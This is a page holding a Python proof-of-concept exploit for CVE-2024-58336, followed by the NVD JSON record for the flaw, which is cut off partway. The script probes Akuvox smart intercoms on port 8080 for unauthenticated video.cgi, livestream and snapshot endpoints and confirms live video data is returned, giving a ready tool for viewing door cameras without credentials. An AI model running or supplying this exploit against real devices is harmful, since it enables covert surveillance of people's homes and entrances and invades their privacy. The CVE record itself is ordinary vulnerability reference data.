CVE-2024-58336

#!/usr/bin/env python3 # CVE-2024-58336 PoC - Akuvox Smart Intercom Unauthenticated Video Stream Access # This PoC demonstrates the vulnerability in Akuvox Smart Intercom S539 import requests import sys import re def check_vulnerability(target_ip, port=8080): """ Check if target is vulnerable to CVE-2024-58336 """ print(f"[*] Checking CVE-2024-58336 on {target_ip}:{port}") # Try to access the video endpoint without authentication endpoints = [ f"/video.cgi", f"/cgi-bin/video.cgi", f"/cgi-bin/video", f"/livestream.cgi", f"/cgi-bin/livestream.cgi" ] for endpoint in endpoints: url = f"http://{target_ip}:{port}{endpoint}" try: print(f"[*] Trying endpoint: {url}") response = requests.get(url, timeout=10, stream=True) # Check if we get a video stream response if response.status_code == 200: content_type = response.headers.get('Content-Type', '') content_length = response.headers.get('Content-Length', 'Unknown') print(f"[+] SUCCESS! Endpoint {endpoint} is accessible") print(f"[+] Content-Type: {content_type}") print(f"[+] Content-Length: {content_length}") print(f"[+] Status Code: {response.status_code}") # Try to read first chunk to confirm video data try: chunk = next(response.iter_content(chunk_size=1024)) if len(chunk) > 0: print(f"[+] Received {len(chunk)} bytes of video data") return True except: pass except requests.exceptions.Timeout: print(f"[-] Request timeout for {endpoint}") except requests.exceptions.ConnectionError: print(f"[-] Connection error for {endpoint}") except Exception as e: print(f"[-] Error accessing {endpoint}: {str(e)}") print("[-] No vulnerable endpoints found") return False def exploit_video_stream(target_ip, port=8080): """ Exploit the vulnerability to access video stream """ print(f"\n[*] Attempting to exploit video stream on {target_ip}:{port}") # Common video stream endpoints endpoints = [ "/video.cgi", "/cgi-bin/video.cgi", "/cgi-bin/snapshot.cgi?output=jpg" ] for endpoint in endpoints: url = f"http://{target_ip}:{port}{endpoint}" try: print(f"[*] Requesting: {url}") response = requests.get(url, timeout=10, stream=True, headers={ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' }) if response.status_code == 200: print(f"[+] Video stream accessible at {url}") print(f"[+] Headers: {dict(response.headers)}") return True except Exception as e: continue return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 cve-2024-58336.py <target_ip> [port]") print("Example: python3 cve-2024-58336.py 192.168.1.100 8080") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080 print("=" * 60) print("CVE-2024-58336 - Akuvox Smart Intercom Unauthenticated Access") print("=" * 60) is_vulnerable = check_vulnerability(target, port) if is_vulnerable: print("\n[!] Target is VULNERABLE to CVE-2024-58336") print("[!] Attackers can access video streams without authentication") exploit_video_stream(target, port) else: print("\n[*] Target appears to be NOT vulnerable")

{"cve": {"id": "CVE-2024-58336", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:48.880", "lastModified": "2026-01-16T19:16:15.663", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Akuvox Smart Intercom S539 contains an unauthenticated vulnerability that allows remote attackers to access live video streams by requesting the video.cgi endpoint on port 8080. Attackers can retrieve video stream data without authentication by directly accessing the specified endpoint on affected Akuvox doorphone and intercom devices."}, {"lang": "es", "value": "Akuvox Smart Intercom S539 contiene una vulnerabilidad no autenticada que permite a atacantes remotos acceder a transmisiones de video en vivo solicitando el endpoint video.cgi en el puerto 8080. Los atacantes pueden recuperar datos de transmisión de video sin autenticación accediendo directamente al endpoint especificado en dispositivos de portero automático y de intercomunicación Akuvox afectados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:akuvox:s539_firmware:912.30.1.137:*:*:*:*:*:*:*", "matchCriteriaId": "4B93FB44-0535-41BC-BF4C-2D8F0C3FE85D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:akuvox:s539:-:*:*:*:*:*:*:*", "matchCriteriaId": "675AF904-EEDF-4BED-A22E-A1861DD9914F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:akuvox:s532_firmware:912.30.1.137:*:*:*:*:*:*:*", "matchCriteriaId": "0FAC3868-AEFE-4D6A-9B46-E5D1C2EB71D8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:akuvox:s532:-:*:*:*:*:*:*:*", "matchCriteriaId": "84E3746E-8A88-4859-B1AC-2EED52F5BAD2"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:akuvox:x916_firmware:912.30.1.137:*:*:*:*:*:*:*", "matchCriteriaId": "F0FBA49A-8092-4FCD-88CC-94112DEE5B60"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:akuvox:x916:-:*:*:*:*:*:*:*", "matchCriteriaId": "9DAFEA0C-F8CF-4F1D-8088-6F964806C6EB"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "nega ... (truncated)